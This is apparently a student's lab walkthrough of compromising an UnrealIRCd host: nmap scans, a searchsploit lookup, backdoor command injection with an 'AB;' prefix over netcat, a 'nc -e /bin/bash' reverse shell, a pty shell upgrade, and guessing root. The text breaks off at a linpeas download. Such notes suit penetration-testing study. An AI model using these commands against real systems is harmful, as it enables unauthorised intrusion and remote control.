February 29th 2023

Target is

connecting via openvpn

openvpn oscp.vpn


nmap -sC -sV -p- -vv 


6667/tcp open  irc     syn-ack UnrealIRCd (Admin email

6697/tcp open  irc     syn-ack UnrealIRCd

8067/tcp open  irc     syn-ack UnrealIRCd (Admin email

Service Info: Host:

IRC URL no dice


searchsploit UnrealIRCd

------------------------------------------- ---------------------------------

 Exploit Title                             |  Path

------------------------------------------- ---------------------------------

UnrealIRCd - Backdoor Command Exec | linux/remote/16922.rb

UnrealIRCd - Local Configuration S | windows/dos/18011.txt

UnrealIRCd - Remote Downloader/Exe | linux/remote/

UnrealIRCd 3.x - Remote Denial of Service  | windows/dos/

------------------------------------------- ---------------------------------

Shellcodes: No Results

searchsploit -v -w linux/remote/16922.rb

[i] Unable to detect version in terms: linux/remote/16922.rb

[i] Enabling 'searchsploit --strict'

-------------------------------- --------------------------------------------

 Exploit Title                  |  URL

-------------------------------- --------------------------------------------

UnrealIRCd - Backdoor C |

So it seems I literally only need to prepend my commands with "AB;" lol


Now to test if the connection works

Checked ifconfig and I'm connected to the LAN via eth0 as

sudo tcpdump -i eth0 icmp

Now to connect to IRC

nc 6667 -vvv

While my hostname is being resolved I'll pass in a command here

AB;ping -c 1

The ping went through. Seems that even though the IRC failed to validate the command still goes through

Netcat listener time

nc -nvlp 7777

p has to be at the end 

Now to send the reverse shell connection from the target

AB;nc 7777 -e /bin/bash

We're in 👍

Now trifiling through home directory I find local.txt

Contains the user flag 

Shell Upgrade:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation - Command & Control / C2

Now I want root after getting inside.

Method #1 - Guess

Actually try root

su root


The go to root's home

cd ~

There is proof.txt

root flag obtained 🏁

Method #2 - Run tools - linpeas


On Kali: python -m SimpleHTTPServer 9999

On Server: wget